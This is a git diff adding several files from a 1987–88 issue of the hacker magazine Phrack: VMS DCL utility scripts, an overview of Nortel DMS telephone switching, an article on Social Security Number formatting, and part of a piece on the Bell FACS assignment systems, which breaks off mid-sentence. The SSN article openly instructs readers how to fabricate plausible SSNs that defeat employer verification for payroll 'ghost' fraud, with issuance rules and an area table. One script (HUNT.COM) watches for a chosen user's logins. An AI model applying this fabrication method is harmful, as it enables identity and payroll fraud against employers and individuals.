+$     lengthflag = (f$length(userfile'dispct') .gt. 18)
+$     if lengthflag then write sys$output -
+         f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
+$     if (.not. lengthflag) then write sys$output -
+         f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
+$     DISPDONT:
+$     dispct = dispct + 1
+$     if (dispct .le. dirct) then goto DISPLOOP
+$  goto DIRMENU
+$!
+$  DIRNONE:
+$  write sys$output "No subdirectories to choose, or no directory privileges."
+$  write sys$output " "
+$  goto DIREND
+$!
+$  DIREND:
+$  set message 'error_message'
+$  on control_y then exit
+$  on control_c then exit
+$  if (ndir .eqs. "*") then goto DISPLAY
+$  goto PARSE
+$!
+$!-Help-----------------------------------------------------------------------
+$!
+$  HELP:
+$  type sys$input
+
+               CD.COM  Version 6  VMS Change Directory Command
+
+                         Usage:  CD command/directory
+
+CD         Display home directory,       CD ..       Change directory to the
+           current directory, node.      CD [-]      dir above current dir.
+
+CD \       Change directory to your      CD ..sub    Change directory to a
+CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.
+
+CD dir     Change directory to the       CD *        Display/select the
+CD [dir]   [dir] directory.                          available subdirectories.
+
+CD .sub    Change directory to the       CD .        Reset current directory.
+CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.
+
+     CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
+     To make CD available from                To have the VMS $ prompt
+     any directory you change to.             display the current directory.
+
+                              By The Mentor
+$  goto END
+
+
+                              Code for HUNT.COM
+                              >>>>>>>>>>>>>>>>>
+
+
+$ ! HUNT.COM
+$ ! By The Mentor
+$ ! Updated by: The Mad Mexican
+$ ! Usage: SPAWN/NOWAIT @HUNT
+$ !
+$ !Searches SHOW USER output for a specified user,  strobes at given
+$ !intervals considering the severity of the hunt at which time output
+$ !is generated and process terminates. If user loggs in then output
+$ !is generated and process terminates. May check both nodes if a set
+$ !host is called.  Also supports a file with the names to be hunted for.
+$ !
+$ !  *** NOTE ***   This is set up for a two-node system with NYSSA
+$ !                 being the default node and TEGAN being the alternate
+$ !                 node (Circuit Breaker and some others will recognize
+$ !                 the nodes as my 'home' ones.)  You will need to
+$ !                 slightly modify the code to reflect the nodename(s)
+$ !                 of whatever system you are using...
+$ !
+$ !
+$ !
+$ say="write sys$output"
+$ on control then goto door
+$ monitored_node = "''NODE'"
+$ say "Monitoring node ''monitored_node'.  <HIT RETURN>"
+$ severity_of_hunt:
+$ inquire selection "Severity of HUNT, 1 being the most urgent: 1-2-3"
+$ if selection.ge.2 then goto selection_2
+$ delay="wait 00:00:20"
+$ loop_count=40
+$ goto begin_process
+$ selection_2:
+$ if selection.eq.3 then goto selection_3
+$ delay="wait 00:01:00"
+$ loop_count=8
+$ goto begin_process
+$ if selection.gt.3 then goto severity_of_hunt
+$ delay="wait 00:02:30"
+$ loop_count=20
+$ begin_process:
+$ if monitored_node.eqs."TEGAN" then goto search_file_tegan
+$ if f$search("nyssa.dat9") .nes. "" then goto file_exist
+$ goto continue
+$ search_file_tegan:
+$ if f$search("tegan.dat9") .nes. "" then goto file_exist
+$ continue:
+$ say "hit <RETURN>"
+$ inquire/nopunctuate choice9 "Who are we hunting for? "
+$ if choice9 .eqs. "" then exit
+$ count = 0
+$ bell_sound[0,8]=%X07
+$ top:
+$ sho user/output='monitored_node'.dat9
+$ purge 'monitored_node'.dat9
+$ set message/nofac/noid/notext/nosev
+$ search 'monitored_node'.dat9 'choice9'
+$ a=$severity
+$ if a .eqs. "1" then goto found_user
+$ set message 'temp_msg9'
+$ count = count + 1
+$ if count .ge. 'loop_count' then goto give_up
+$ delay
+$ goto top
+$ file_exist:
+$ say "ERROR - Could not create temporary data file."
+$ say "Please delete or rename ''NODE'.DAT9"
+$ exit
+$ found_user:
+$ say bell_sound
+$ say "''choice9' is now online on node ''monitored_node'."
+$ say bell_sound
+$ goto door
+$ give_up:
+$ say " "
+$ say "''choice9' has not yet logged in on ''monitored_node'."
+$ door:
+$ say bell_sound
+$ say "HUNT routine has terminated on node ''monitored_node'."
+$ delete/noconfirm/nolog 'monitored_node'.dat9;*
+$ set message 'temp_msg9'
+$ exit
+
+                              Code for ALARM.COM
+                              >>>>>>>>>>>>>>>>>>
+
+$ ! ALARM.COM
+$ ! By The Mentor
+$ ! Usage: SPAWN/NOWAIT @ALARM
+$ ! Strobes f$time() every 5 seconds until specified time
+$ ! is met at which time output is generated and process terminates.
+$ CLR = " "
+$ count = 0
+$ PID           = F$PID(CONTEXT)
+$ TERMINAL      = F$GETJPI(''PID',"TERMINAL")
+$ DEVICE        = F$GETDVI(TERMINAL,"DEVTYPE")
+$ IF DEVICE .EQS. 110 THEN CLR = "[H[2J"  ! VT220
+$ IF DEVICE .EQS.  98 THEN CLR = "[H[2J"  ! VT102
+$ IF DEVICE .EQS.  96 THEN CLR = "[H[2J"  ! VT100
+$ IF DEVICE .EQS.  64 THEN CLR = "HJ"     ! VT52
+$ CLS = "WRITE SYS$OUTPUT CLR"
+$ DATE       = F$CVTIME(F$TIME())
+$ NODE       = F$GETSYI("NODENAME")
+$ bell[0,8]=%X07
+$ ON CONTROL THEN GOTO DOOR
+$ say = "write sys$output"
+$ say f$cvtime(,,"TIME")
+$ say " "
+$ say "Hit (RETURN)"
+$ say " "
+$ inquire/nopunctuate alarm "What time shall I ring you - "
+$ a_hour = f$element(0,":",alarm)
+$ a_minute = f$element(1,":",alarm)
+$ a_second = f$element(2,":",alarm)
+$ time_check:
+$ hour = f$element(0,":",f$cvtime(,,"TIME"))
+$ minute = f$element(1,":",f$cvtime(,,"TIME"))
+$ second = f$element(2,":",f$element(0,".",f$cvtime(,,"TIME")))
+$ if hour .ge. a_hour .and. minute .ge. a_minute .and. second .ge.
+  a_second then goto top
+$ if hour .ge. a_hour .and. minute .ge. a_minute then goto top
+$ wait 00:00:05
+$ goto time_check
+$ top:
+$ count = count + 1
+$ cls
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say "                              A L A R M   O N"
+$ say bell
+$ say "                                 ",f$element(0,".",f$cvtime(,,"TIME"))
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ say " "
+$ wait 00:00:01.50
+$ if count .le. "6" then goto top
+$ door:
+$ say "ALARM OFF"
+$ say f$element(0,".",f$cvtime(,,"TIME"))
+$ say bell
+$ exit
+
+
+                               Code for CGO.COM
+                               >>>>>>>>>>>>>>>>
+
+$! CGO.COM
+$! By The Mentor
+$! One-Line compile/link/execute of C programs
+$! Usage: CGO :== @CGO.COM
+$!        CGO filename
+$!
+$if p1 .nes. "" then c_filename :== 'p1
+$ write sys$output "Compiling:"
+$ cc 'c_filename/list='c_filename.lst
+$ write sys$output "Linking:"
+$ link 'c_filename ,options_file/opt
+$ write sys$output "Running:"
+$ assign/user sys$command sys$input
+$ run 'c_filename
+$ exit
+------------------------------------------------------------------------------
+
+     Well, that's it.  I hope to be back in the next issue with some other
+programs.  And remember, any programmers out there, get in touch with me!
+                                  The Mentor
+                              Thanksgiving 1987
+==============================================================================
diff --git a/phrack19/3.txt b/phrack19/3.txt
new file mode 100644
index 0000000..f6df4f0
--- /dev/null
+++ b/phrack19/3.txt
@@ -0,0 +1,368 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 19, Phile #3 of 8
+
+ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
+|_|                                                                       |_|
+|_|              Understanding the Digital Multiplexing System            |_|
+|_|                                (Part2)                                |_|
+|_|                                                                       |_|
+|_|                                   by                                  |_|
+|_|                                                                       |_|
+|_|                                Control C                              |_|
+|_|                                                                       |_|
+|_|                                   &                                   |_|
+|_|                                                                       |_|
+|_|                        The Tribunal Of Knowledge                      |_|
+|_|_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|_|
+|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
+
+
+  Well some of you may recall my file on Digital Multiplexing in Phrack 10.
+Well this is part 2 that was promised about a year and a half ago.  I was
+finished with this file in May of 87 and I just decided to release it now.
+Here it is!
+
+  DMS switches were first introduced in 1979, since then it has been modified
+to interface numerous types of switches.  DMS has the ability to interface
+with SP-1, #5 XBar, 1ESS, 2ESS, 3ESS, 4ESS, NX1D, NX1E, TSD, SXS, ETS4, NO. 1
+EAC, NO. 2 EAX, NO. 3 EAX, TSPS, CAMA/3CL boards, Stromberg Carlson Turret of
+ONI and Visual Indicators, Modified North Electric TSD for ONI, Stomberg
+Carlson (CAMA operator Position - ONI/ANI), AE #31 Switchboard, Co-located
+NT/AE switchboard I/C, O/G, UDC data poller of OM, DACS (Directory Assistance
+Charging System), NT #144 LTD, WECO #14 LTD, WECO #16 LTD, CALRS (Centralized
+Automated Loop Reporting System), Badger 612A, AE #1 and #21 LTD, AE #30, SC
+#14 LTD, Lordel MITS70 line Test System, Porta System Line Test Unit, Pulsar
+II IMTS, Teradyne loop test unit, and the WECO MLT 1 (Mechanized Loop Testing
+System).
+
+Common Channel Interoffice Signaling
+
+  Common Channel Interoffice Signaling (CCIS) is a way of signaling and a way
+of implementing network level services. CCIS provides reliable, crystal clear
+data signaling links between the network and the switching offices.  The CCIS
+signaling method uses transmission equipment that is separate from voice
+trunks.
+
+Common Channel Interoffice Signaling No. 6
+
+  The basis for the CCIS system is the International Consultative Committee on
+Telephone and Telegraph (CCITT) No. 6 international standard, which is brought
+to it's fullest capacity for use in the Stored Program Control (SPC) network
+of AT&T.
+
+  The CCIS6 network contains a bunch of signaling regions, each having a pair
+of interconnected Signal Transfer Points (STP).  The switching systems put
+into CCIS6 then connecting to STPs are called Serving Offices (SO).
+
+  Band Signaling (CCIS-BS) is used on trunk signaling for intertoll-type
+trunks using the CCIS network.
+
+  Direct Signaling (CCIS-DS) is used for signaling between SPC switching
+machines and a Network Control Point (NCP).  At the present time CCIS6 can
+handle Enhanced INWATS Originating Screening Office (OSO), Calling Card
+Validation (CCV), Mechanized Calling Card Service (MCCS), and Billed Number
+Screening (BNS).  CCIS6 is available with DMS-100/200, DMS-200, and
+DMS-100/200 or DMS-200 with TOPS.
+
+CCIS6 Diagram:
+                                            NSB        ST
+                      ------------         - - - - - - - - - - -
+          DTC        |            |      |            -------    |
+         - - -  DS30 |    IPML    | DS30 |  - - -    | ||    |   |
+--------|     |------|- - - - - - |------|-|     |---| ||    |   |
+Digital  - - -       |            |      |  - - -    | ||    |   |
+Trunks               |            |      |           | ||    |   |
+                     |            |      |            -------    |
+                     |            |        - - - - - - -|- - - -
+          DTC        |            |          TM         |
+  DIG    - - -  DS30 |    NUC     |  DS30   - - -      -----
+--------|     |------|- - - - - - |--------|     |----|     |
+^        - - -       |Network     |         - - -      -----
+CCIS         \        ------------                     Modem
+Signaling     \            |
+           - - -         -----
+AN Links--|     |       | CCC |
+           - - -         -----
+          Channel
+           Bank
+
+
+Acronyms:
+
+        DIG - Digital
+        AN - Analog
+        DTC - Digital Trunk Controller
+        MSB - Message Switch Buffer
+        ST - Signaling Terminal
+        TM - Trunk Module
+        NUC - Nailed-Up Connection
+        IPML - Inter-Peripheral Message Link
+
+
+Common Channel Interoffice Signaling No. 7
+
+   Common Channel Signaling (CCS) No. 7 or CCIS7 is a CCS system bases on
+CCITT No. 7.  CCIS7/CCS7 on the DMS switch consists of two parts the Message
+Transfer Part (MTP) and the Interim Telephone user Part.  They are compatible
+with DMS-100, DMS-200, DMS-100/200, and DMS-100/DMS-100/200 with TOPS.
+
+   CCIS7 can't tell the difference between banded and direct signaling.  CCIS7
+uses Destination/Origination Point Codes (DPC/OPC) to rout back to the switch.
+
+   CCIS7 can handle Automatic Calling Card Service (ACCS), Enhanced INWATS,
+Local Area Signaling Services, and Direct Service Dialing Capabilities.
+
+Equal Access
+
+  The DMS-200 Access Tandem (AT) gives a traffic concentration and
+distribution function for interLATA traffic originating and a distribution
+function for interLATA traffic origination or terminating inside a Local
+Access and Transport Area (LATA). This gives the interLATA Carrier (IC) access
+to more that one end office inside the LATA.  It can handle InterLata Carrier
+access codes (10xxx), 10xxx and 950-yxxx dialing, Automatic Number
+Identification (ANI) on all calls, answer supervision, equal access Automatic
+Message Accounting (AMA) for both originating and terminating calls, and
+operator service signaling.
+
+   The DMS-100 EA gives direct and tandem switched access service inside the
+LATA for originating and terminating to interLATA Carriers.  It is available
+in the following three ways:
+
+Equal Access End Office (EAEO)
+
+  DMS-100 Equal Access End Office (EAEO) gives a direct interconnection to
+interLATA Carriers (IC) and international Carriers (INCs) Point of Presence
+(POP) inside the LATA.
+
+Access Tandem with Equal Access End Office
+
+  The DMS-200 Access Tandem (AT) when used with equal access end office (EAEO)
+lets trunk tandem interconnect to ICs/INCs POP inside the LATA.
+
+   The connection of the Equal Access End Office (EAEO) to an IC/INC through
+the DMS-200 Access Tandem (AT) uses what is called two-stage overlap output
+pulsing which makes the time it takes to set up a call quicker.  The AT uses
+the digits OZZ + XXX out pulsed  in the first stage to identify the IC/INC
+dialed and to pick and outgoing trunk.  Then a connection is established from
+the IC/INC to the EAEO through the AT.  The second stage digits, consist of
+ANI and the called numbers are passed through the DMS- 200 AT at the IC/INC.
+
+   A AMA terminating record in AT&T format is produced by the DMS-200 for all
+the EAEOs.  A per call terminating AMA record is made for calls that get to
+the stage where the trunk from the IC/INC has been seized and a "wink" has
+been returned by the DMS-200 AT.
+
+Access Tandem with a Non-Equal Access End Office
+
+   DMS-200 AT using a non-equal access end office gives trunk tandem
+connection to an IC/INC POP within the LATA.  To set up a call, connection of
+Feature Group B (FGB) or Feature Group C (FGC) End Office to an IC/INC through
+the DMS-200 AT, uses the standard Bell Central Automatic Message Accounting
+(CAMA) signaling.  The Access Tandem uses the XXX digits of the access code
+950-YXXX out pulsed from the FGB end office to identify the IC/INC and to
+connect to a outgoing trunk.
+
+Mechanized Calling Card Service (MCCS)
+
+   The fraudulent use of calling cards, third number and collect calls and the
+increasing movement to automate current operator services has directly led to
+the implantation of the Mechanized Calling Card Service (MCCS) to DMS-200/TOPS
+and to the remote and host Operator Centralization (OC).
+
+   MCCS uses CCIS to relay queries and responses to and from the DMS-200/TOPS.
+Operator handled calling card calls and the direct entry by subscribers of
+Calling Cards by DTMF (Touch-Tones) telephones are given special provisions by
+the MCCS.  Both, the operator handling and the direct entry of calling card
+calls, are decreasing the size operators.
+
+   Billed Number Screening (BNS) gives an enhancement to the operator-handled
+collect and third-number billing by using CCIS to screen a number at the
+billing validation data base for billing restrictions (i.e. the third number
+is a fortress).  This feature naturally will reduce fraudulent use of the
+collect call feature.
+
+   Common Channel Interoffice Signalling-Direct Signalling (CCIS-DS), which is
+the feature that the MCCS is designed around, is used to transmit messages to
+and from many possible Billing Validation Centers (BVCs).  Messages
+transmitted to the BVC about MCCS include the billing number and the Personal
+Identification Number (PIN).  In BNS the messages have the special billing
+number (collect or third number).  The return messages from the BVC include
+validity (of the number), billing restrictions (if any), and the Revenue
+Accounting Office (RAO) code.
+
+Auxiliary Operator Services System
+
+   The DMS-200 Auxiliary Operator Services System (AOSS) is used primarily for
+Directory Assistance and the intercept needs that are not included in the TOPS
+package.  The AOSS is similar to TOPS and co-exist with TOPS on the DMS-200
+Toll system.
+
+   Major benefits of the AOSS include Directory Assistance is provided with a
+modern environment, AOSS position administrative activities are performed by
+the DMS-200 toll maintenance system, trunking savings are achieved by
+combining trunking for 1+ and 0+, and Directory Assistance traffic, DA
+services are managed by using TOPS methods, Creation of a built-in training
+system, which does not require additional training equipment and reduces
+training costs.
+
+Integrated Business Network
+
+   The Integrated Business Network (IBN) is a revenue-producing concept
+designed for small and big businesses to offer modernized PBX and Centrex
+features.  The Operating Company can use the IBN to maintain and enhance its
+competitive position on a operational DMS-100 and DMS 100/200 switches.
+While using the DMS-100 switch, the Operating Company can support varying
+business features along with existing local/toll traffic.
+
+   IBN services can be introduced to a Centrex-Central Office (CO) or a
+Centrex-Customer Unit (CCU) by additional software modules and minor hardware
+enhancements.
+
+   Current IBN features include:  A growing system that can handle 30,000
+lines, networking capabilities, city wide service for DMS- 100 switch and
+remotes for any one customer station Message Detail Recording (SMDR), which
+gives IBN customers call records. The records can be used for system analysis
+and control and station charge-back.  SMDR can use LAMA records, if the IBN
+host has LAMA equipment, Centralized attendant maintenance and administration
+functions and Direct Inward Dialing (DID).
+
+Electronic Switched Network (ESN)
+
+   The Electronic Switched Network is designed to meet the telecommunication
+needs of large multi-location corporations. The ESN is made up of a SL-1 or
+SL-100 Digital Business Communications System with networking features or a
+DMS-100 IBN host.  The SL-1 can handle from 30-5000 lines.  The SL-100 and the
+DMS-100 IBN hosts can hold from a few thousands to 30,000 lines.
+
+   A DMS-100 IBN or SL-100 can remotely serve many locations from the host
+site.  This is done by a connection through digital transmission facilities
+which are set up at remote modules at the subscriber's premises.
+
+Specialized Common Carrier Service (SCCS)
+
+   The DMS-250 Specialized Common Carrier Service (SCCS) provides the
+capability of Analog to Digital (A/D) and Digital to Analog (A/D) conversions
+which are necessary with analog circuits. The DMS-250 can also switch voice
+and data circuits.
+
+   The DMS-250 takes either analog or digitally encoded info and by using time
+slot interchange, switches it from any input port to a temporary addressed and
+connected exit port.  The info may or may not be converted back to analog.
+
+Normal Private Telecommunications Network Diagram:
+
+
+           -----               ------
+ [Phone]--| SnS |             | SL-1 |-[Phone]
+          | PBX |             | PBX  |
+           -----               ------
+           |  |DOD/DID   DOD/DID|  |
+           |   -------   -------   |
+           |Tie       | |       Tie|
+           |Trunk  ---------  Trunk|
+            ------| Class-5 |------
+              ----| Centrex |----
+             |     ---------     |
+             |                   |
+             |                   |
+             |                   |
+           -----  Tie Trunk  ---------
+          | SnS | ----------| Class-5 |
+          | PBX |           | Centrex |
+           -----             ---------
+             |                   |
+             |                   |
+             |                   |
+             |                   |
+          -------             ------
+ [Phone]-| Small |           | SL-1 |-[Phone]
+         |  PBX  |           |      |
+          -------             ------
+
+Cellular Mobile Radio Service
+
+   A cellular system consists of two main parts a cellular switch and cell
+site equipment.
+
+Cellular Switching Systems
+
+   A cellular switch performs three main functions audio switching, cell site
+control, and system administration.
+
+   The DMS switches provide three basic implementations for cellular switching
+Stand-alone, Combined, and Remote.
+
+   Stand-alone switching is done by a Mobile Telephone Exchange (MTX) which is
+interfaced with one or more class 5 end offices.  The connection is made by
+DID/DOD trunks.  Depending on the needs of the area, the MTX can be divided as
+follows:  MTX which serves urban areas, MTXC which handles suburban areas, and
+MTXM which is used for rural areas.
+
+   Combined switching is incorporated into a DMS-100 by some hardware
+additions and cellular software.  Combined switching is designed to give a
+easy, cost-effective way to install cellular services to an existing host.
+
+   Remote Switching is done by combining Remote Switching Center (RSC) with a
+Cell Site Controller (CSC).  This combination is hosted by either a
+stand-alone or a combined switch.  Remote Switching is designed for serving
+suburban centers, remote areas, or a small community and it gives extra
+flexibility for a growing system.
+
+   All of these cellular switches have the ability to balance the workload
+among various cell sites.  For example, if one site's workload reaches the
+programmable level of congestion, calls would be routed to nearby sites that
+can handle the extra calls.
+
+Cell Site Equipment
+
+   Cell site equipment consists of a CSC and radio equipment. The CSC is
+controlled by the cellular switch and it controls radio equipment and
+maintenance tasks.  The CSC will work on any MTX cellular switch because of
+the Remote Cluster Controller (RCC).
+
+   The radio equipment consists of self-contained Radio Channel Units (RCU),
+antennas, transmitter multi-couplers and receiver combiners.
+
+   By different program software a RCU can perform voice, control locating,
+and test functions.  The self contained nature allows the RCU be remotely
+located to the CSC. A RCU has built-in circuitry for extended testing of the
+radio part of the system.
+
+
+           --------                               ----------
+[phone]--| Remote |                             | SL-1 PBX |--[phone]
+         | Module |                             | ESN Main |
+          --------                               ----------
+              |                                       |
+              |  DS-1 Facility                        |  DS-1 Facility
+              |            --------------             |
+               -------->  | Local Class 5|  <---------
+          [phone]---------|    DMS-100   |
+                      ----|    IBN/ESN   |-------------
+        2W Loop MFIDP |    --------------             | ESN Trunk Group
+           or DS-1    |           |                   |     or DS-1
+                      |         -----         ---------------
+                      |        | CSC |       | Local Class 5 |
+                   --------     -----        |    DMS-100    |
+                  | SL-100 | <--- DS-1 ----> |    IBN/ESN    |
+                   --------     Facility  Ph  ---------------
+                      |                              |
+                      |                              |
+                      | DS-1 Facility                | DS-1 Facility
+                      |                              |
+                   --------                      ----------
+         [phone]--| Remote |                    | SL-1 PBX |--[phone]
+                  | Module |                    | ESN Main |
+                   --------                      ----------
+
+
+<End of File>
+<5-23-87>
+
+If you have any questions contact me or any other member of the T0K!
+
+              Control C
+               !T0K! (1987)
+==============================================================================
diff --git a/phrack19/4.txt b/phrack19/4.txt
new file mode 100644
index 0000000..7ec9689
--- /dev/null
+++ b/phrack19/4.txt
@@ -0,0 +1,82 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 19, Phile #4 of 8
+
+Social Security Number Formatting
+=================================
+
+Shooting Shark  21 June 88
+
+        Certain types of computer-related fraud, such as creating dummy
+entries in payroll databases, require the creation of a false Social Security
+Number (SS#).  Many employers attempt to detect "ghost" SS#s by running a
+verification program on them.  In this article I will show how to defeat
+verification by creating a legitimate-looking SS#.
+
+        First, some general rules to follow:
+
+        o       The middle two digits of a SS# can be odd or even
+                if issued after 1965.  All numbers issued before 1965
+                that have middle digits of 10 or above should be even.
+
+        o       So far, no SS#s have been issued with a first digit
+                of 8 or 9.  Very few numbers above 595 have been issued,
+                so use caution.  700-729 were issued by the Railroad
+                Retirement Agency a long time ago, and thus would belong
+                to older people.  No numbers in the 596-626 have been
+                assigned yet (as far as I know), but 596-599 has been
+                reserved for Puerto Rico, 600-601 for Arizona, and
+                602-626 has been reserved for California.
+
+        The next step is required only if it is necessary that the place of
+issuance (and thus, probably, state of birth or residence) match the SS#.  In
+this case, refer to the following table:
+
+First Three Digits      Area
+==================      ====
+
+000                     Foreign-Exchange, visitor, etc. (many college
+                        students will have these)
+
+001-003         New Hampshire           004-007         Maine
+008-009         Vermont                 010-034         Massachusetts
+035-039         Rhode Island            040-049         Connecticut
+050-134         New York                135-158         New Jersey
+159-211         Pennsylvania            212-220         Maryland
+221-222         Delaware                223-231         Virginia
+
+232-236 (EXCEPT
+SS#s starting with
+"232 30"...)            West Virginia
+232 30                  North Carolina
+
+237-246         North Carolina          247-251         South Carolina
+252-260         Georgia                 261-267         Florida
+589-595         Florida                 268-302         Ohio
+303-317         Indiana                 318-361         Illinois
+362-386         Michigan                387-399         Wisconsin
+400-407         Kentucky                408-415         Tennessee
+416-424         Alabama                 425-428         Mississippi
+587-588         Mississippi             429-432         Arkansas
+433-439         Louisiana               440-448         Oklahoma
+449-467         Texas                   468-477         Minnesota
+478-485         Iowa                    486-500         Missouri
+501-502         North Dakota            503-504         South Dakota
+505-508         Nebraska                509-515         Kansas
+516-517         Montana                 518-519         Idaho
+520             Wyoming                 521-524         Colorado
+525             New Mexico              585             New Mexico
+526-527         Arizona                 528-529         Utah
+530             Nevada                  531-539         Washington
+540-544         Oregon                  545-573         California
+574             Alaska                  575-576         Hawaii
+577-579         Washington, D.C.        580             Virgin Islands
+580-584         Puerto Rico
+
+586             Guam, American Samoa, and Philippine Islands
+
+700-729         Railroad Retirement
+
+An example:  If you were Stan Cisneros living in Burlingame, California, and
+you were born in 1970, your SS# might be 546-28-4197.
+==============================================================================
diff --git a/phrack19/5.txt b/phrack19/5.txt
new file mode 100644
index 0000000..c4fd3fe
--- /dev/null
+++ b/phrack19/5.txt
@@ -0,0 +1,239 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 19, Phile #5 of 8
+
+                    Facility Assignment and Control System
+
+                         Written by Phantom Phreaker
+
+
+INTRODUCTION
+------------
+
+    The Facility Assignment and Control  System (FACS) is an integrated
+network component system that most phreaks and hackers know of from an old
+file named 'FACS FACTS' written by Sharp Razor.  While this file provides an
+accurate description of the FACS system, it is lacking in detail and length.
+This file will provide accurate information about the FACS system and is
+intended for the true telecom enthusiast (i.e. this article is not for people
+who use codes and call it 'phreaking' or for people who think that phreaking
+is just 'making free phone calls').  Hopefully the phreaks and hackers of the
+world who want to know how things work in the telephone network will benefit
+from this information. Any malicious use of this information is strictly
+prohibited.  The contents of this file are for informational and educational
+purposes only.
+
+
+GENERAL DESCRIPTION
+-------------------
+
+    FACS can be described as a full-featured outside plant and central office
+facilities assignment system.  For the people who are unfamiliar with these
+terms, the outside plant is the portion of the telephone network that runs
+from a telco office (such as a class five end office (EO)) to the subscriber,
+including manholes and distribution/access points such as Serving Area
+Interfaces (SAI) which are large, double-door outdoor equipment cabinets which
+allow the repair craft to repair, test, and access a multitude of service
+lines in that area.
+
+    FACS is made up of five component systems, or sub-systems, and some of
+these are also used as stand-alone systems (i.e. in an area that does not use
+FACS, COSMOS can be thought of as a stand-alone system).
+
+    The component systems are:
+
+PREMIS - PREmise Information System
+SOAC - Service Order Analysis & Control
+LFACS - Loop Facility Assignment and Control System
+COSMOS - COmputer System for Main Frame OperationS
+WM     - Work Manager
+
+
+    FACS is used by many departments and work centers in the BOC network.  A
+general example of telco interaction will be included later in the article.
+
+
+PREMIS
+------
+
+    PREMIS supports the customer negotiation (i.e. while a customer talks with
+a BOC service rep, PREMIS is the computer system the rep has access to) and
+service order (SO) preparation process (a SO is basically a request for
+service).  PREMIS is a computer-based information storage and retrieval system
+designed to support the Residence/Residential Service Center (RSC), and in
+some cases, the Business Service Center (BSC).  The RSC is the center that
+residence customers deal with, and the BSC is the center that business
+customers deal with.
+
+    PREMIS provides fast easy access to customer address verification for
+numbered and unnumbered addresses (information is stored by telephone number
+not address), telephone service status at an address (whether the phone is in
+service, disconnected, pending connect, pending disconnect, disconnected due
+to non-payment, etc.), telephone number assignment for customers (PREMIS can
+generate a list of available telephone numbers in a given exchange and the
+available TNs come from COSMOS) and facility assignment data for outward
+orders.
+
+    The following PREMIS features are available to the service reps and have
+special significance to the LAC:
+
+
+    Customer Negotiation:
+
+        Provides customer service address check against a mechanized Street
+        Address Guide (SAG).
+
+        Provides customer status check to a mechanized facility address file
+        which identifies potential Interfering Station (IS) conditions.
+
+        Provides new telephone number assignments through an available TN
+       (Telephone Number) file.
+
+
+    Service Order Preparation:
+
+        Provides SAG data.
+
+        Provides correct address spelling.
+
+
+    PREMIS, as far as I know, does not have any direct dialups so don't get
+your hopes up high.  There may be other ways to access information in PREMIS
+however.
+
+
+SOAC
+----
+
+    The SOAC system is what interfaces FACS with the BOC SOP (Service Order
+Processor).  The SOP is what the service reps enter SO information into and
+the SOP sends the data entered to the SOAC system.  The SOAC system interprets
+and validates this input data.
+
+    SOAC generates Assignment Requests (ARs) which are sent to LFACS and
+COSMOS (see respective sections of this file) to request outside plant (OSP)
+and CO facility assignments, respectively.
+
+    SOAC receives AR Responses (ARRs) from LFACS and WM/COSMOS and merges this
+data and formats the output into a Universal Service Order (USO) assignment
+section.  This USO is returned to the SOP after SOAC has processed it.
+
+    SOAC returns status information and error notification to the SOP.  Status
+information is what tells the service rep who entered the data into the SOP
+whether or not FACS can process that Service Order.  Error notifiers are sent
+back to the SOP when part of the SO is in error.
+
+    SOAC keeps record of status and control information on all SO requests, as
+well as the input image and specific data that came from processing.  This
+information, along with the input image and processing results are referred to
+as the pending assignment data.
+
+    SOs do not automatically flow through SOAC in all cases.  SOAC can analyze
+an order to determine if manual assistance is required, and if it is, a
+Request for Manual Assistance (RMA) notice is sent to the LAC.  LAC personnel
+will use SOAC, and possibly other systems in FACS, such as COSMOS/WM and
+LFACS, to complete the assignment on that SO.
+
+    SOAC also may receive COSMOS system output from certain commands.  One
+such command may be the IJR command, which sets up a circuit for jeopardy
+status. Jeopardy status means that the assignment looks as if it will be (or
+already is) behind schedule for completion.  An example of this is as follows
+(showing COSMOS messages).
+
+WC% IJR
+H ORD nxxxxxxxx/TN nxx-xxxx/JR nx
+RMK NEED TIE PR FOR nxx
+-.
+**ORDER nxxxxxxxx              HAS BEEN GIVEN JEOPARDY STATUS
+  CKTID: TN nxx-xxxx
+**JEOPARDY REASON: nx          mm-dd-yy hh:mm
+OUTPUT SENT TO SOAC
+**IJR COMPLETED   mm-dd-yyy    hh:mm
+
+    The H-line input is the SO number, where n can be alphabetic and x can be
+numeric.  TN is the affected telephone number, JR is the Jeopardy Reason,
+which is a one alpha/one numeric code, RMK is a ReMarK, in this case, a tie
+pair is needed.  The section that starts and ends with two asterisks is the
+COSMOS output, and the rest of the information should be self-explanatory.
+
+
+LFACS
+-----
+
+    The LFACS system keeps an inventory of outside loop plant facilities, such
+as cables (CA), cable pairs (CP), serving terminals, interconnecting points,
+cross-connecting terminals, and things of that nature which should be known to
+the serious phreak.  By the way, if you want to get some very good information
+about the outside loop plant, look for Phucked Agent 04's article in the LOD/H
+Technical Journal issue number 1.  These are excellent files and I recommend
+that every phreak read them if they haven't already.  Anyway, LFACS also
+assigns the outside loop plant facilities to ARs received from SOAC as a
+result of customer SO activity.  The assignment process is automatic on 95% of
+the service requests.
+
+    LFACS provides a computerized version of DPAC and ECCR (Dedicated Plant
+Assignment Cards and Exchange Cable Conductor Records respectively) which were
+previously physical records that were stored at the LAC.  The information
+stored in DPAC is information such as data about a Living Unit Serving
+Terminal, and Living Unit Dedicated Loop Facilities, and ECCR contains
+information such as Pair Selection, Add/Break count, Line and Station
